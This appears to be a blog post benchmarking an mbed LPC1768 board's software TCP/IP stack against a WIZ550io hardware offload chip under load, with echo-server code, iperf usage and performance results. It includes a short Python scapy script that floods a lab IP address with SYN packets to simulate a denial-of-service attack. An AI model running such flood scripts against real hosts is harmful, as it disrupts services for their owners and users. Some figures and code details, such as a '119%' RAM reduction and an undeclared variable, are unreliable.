Firewall for Internet of Things

Intro

** What is a firewall for IoT ?**
– We will compare the traditional method and the proposed method under DoS Attack (SYN-flood attack).

IoT Platform: mbed NXP LPC1768

mbed LPC1768

It is based on the NXP LPC1768, with a 32-bit ARM Cortex-M3 core running at 96MHz. It includes 512KB FLASH, 32KB RAM and lots of interfaces including built-in Ethernet, USB Host and Device, CAN, SPI, I2C, ADC, DAC, PWM and other I/O interfaces. The pinout above shows the commonly used interfaces and their locations. Note that all the numbered pins (p5-p30) can also be used as DigitalIn and DigitalOut interfaces.
– Link1: For more detail

Traditional method: LwIP (TCP/IP software stack) + Ethernet MAC (LPC1768) + Ethernet PHY (DP83848J)@mbed application board (Ethernet connector)

mbed application board
* Feature list
* 128×32 Graphics LCD
* 5 way joystick
* 2 x Potentiometers
* 3.5mm Audio jack (Analog Out)
* Speaker, PWM connected
* 3 Axis /1 1.5g Accelerometer
* 3.5mm Audio jack (Analog In)
* 2x Servo motor headers
* RGB LED, PWM connected
* USB-mini-B Connector
* Temperature sensor
* Socket for for Xbee (Zigbee) or RN-XV (Wifi)
* RJ45 Ethernet Connector
* USB-A Connector
* 1.3mm DC Jack input

Proposed method: WIZ550io (TOE + Ethernet MAC + Ethernet PHY)

WIZ550io
– Link3: WIZ550io components in mbed.org
– Link4: W5500 components in mbed.org

Application for iperf

Recv only code for Software stack

  • fixed an echo server on mbed.
#include "mbed.h"
#include "EthernetInterface.h"

EthernetInterface eth;
int main() 
{
    printf("Trying rn");
    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    

    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

  eth.connect();
  printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected

        }
        client.close();
    }
}

Recv only code for TOE

#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"


//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);
int main() {

    printf("Test - WIZ550iorn");

    /** Set the spi bus clock frequency
     *
     *  @param hz SCLK frequency in hz (default = 1MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X
    */
    spi.frequency(12500000);     
    SPI spi(p5, p6, p7); // mosi, miso, sclk
    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    
    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

    printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected
        }
        client.close();
    }
}

Comparison of memory Size

Software stack TOE (W5500)
Codes  sw stack codes TOE codes
Memory usage sw memory usage sw memory usage

35.2kB(110%) : The LPC1768 has 3 RAM banks: One general purpose one of 32kB, and two additional ones of 16kB each for Ethernet/USB/CAN purposes. Ethernet completely fills one of those additional banks. The online compiler does take this into account for the total RAM usage, but assumes only 32kB is available, so it gets over the 100% what it displays, still will work fine though. (from mbed.org: http://developer.mbed.org/questions/3579/mbed-LPC-1768-RAM-Usage-128-what-does-th/)

** TOE can reduce the flash and RAM usage of by 7% and 119% respectively. **

DoS Attack (Syn-flood attack)

We used the scapy based on python library for DoS Attack.

from scapy.all import

inter = input('inter(time in seconds to wait between 2packets) :')

def synFlood(src, tgt, inter):
    IPlayer = IP(src, dst=tgt)
    TCPlayer= TCP(sport=3000, dport=3000) # as your env. change source and destination port
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter) #

#send(pkts, inter=0, loop=0, verbose=None)
#  Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#  be a packet, an implicit packet or a list of them.
#
#  loop: send the packets endlessly if not 0.
#  inter: time in seconds to wait between 2 packets
#  verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# as your env. change to real IP address and so on.
src = "192.168.77.253" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)

How to use iperf

Iperf is a tool to measure maximum TCP bandwidth, allowing the tuning of various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, datagram loss

# ex.) host IP(192.168.77.34):port[5000], display format is Mbit/sec, interval 1 sec.
>iperf.exe -c 192.168.77.34 -p 5000 -f m -i 1
  • -c : –client host, -c will connect to the host specified.
  • -p : –port #, the server port for the server to listen.
  • -f : –format [], ‘m’ = Mbit/sec
  • -i : –interval #, Sets the interval time in seconds between periodic bandwidth
    Through performance

Network Configuration

  • **Fig. Network configurations to measure performance **
    SW Bandwidth

Network performance

  • Fig. Traditional method: lwIP performance according to traffic of SYN packet
    SW Bandwidth

  • Fig. Proposed method: TOE(W5500) performance according to traffic of SYN packet.
    TOE(W5500) Bandwidth

**The network performance of traditional method is better the proposed method when DoS attack is weak. Because, the traditional method used the bus-interface for MAC. (The proposed method doesn’t used spi-dma.)
However, The proposed method kept up the network performance under SYN-flood attack.
Otherwise, the network performance of the traditional method is became extremely worse according to the interval of SYN-attack.
**

Advertisements

2 thoughts on “Firewall for Internet of Things

  1. Pingback: Hardware TCP/IP – The best firewall for Internet of Things | WIZnet Academy

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s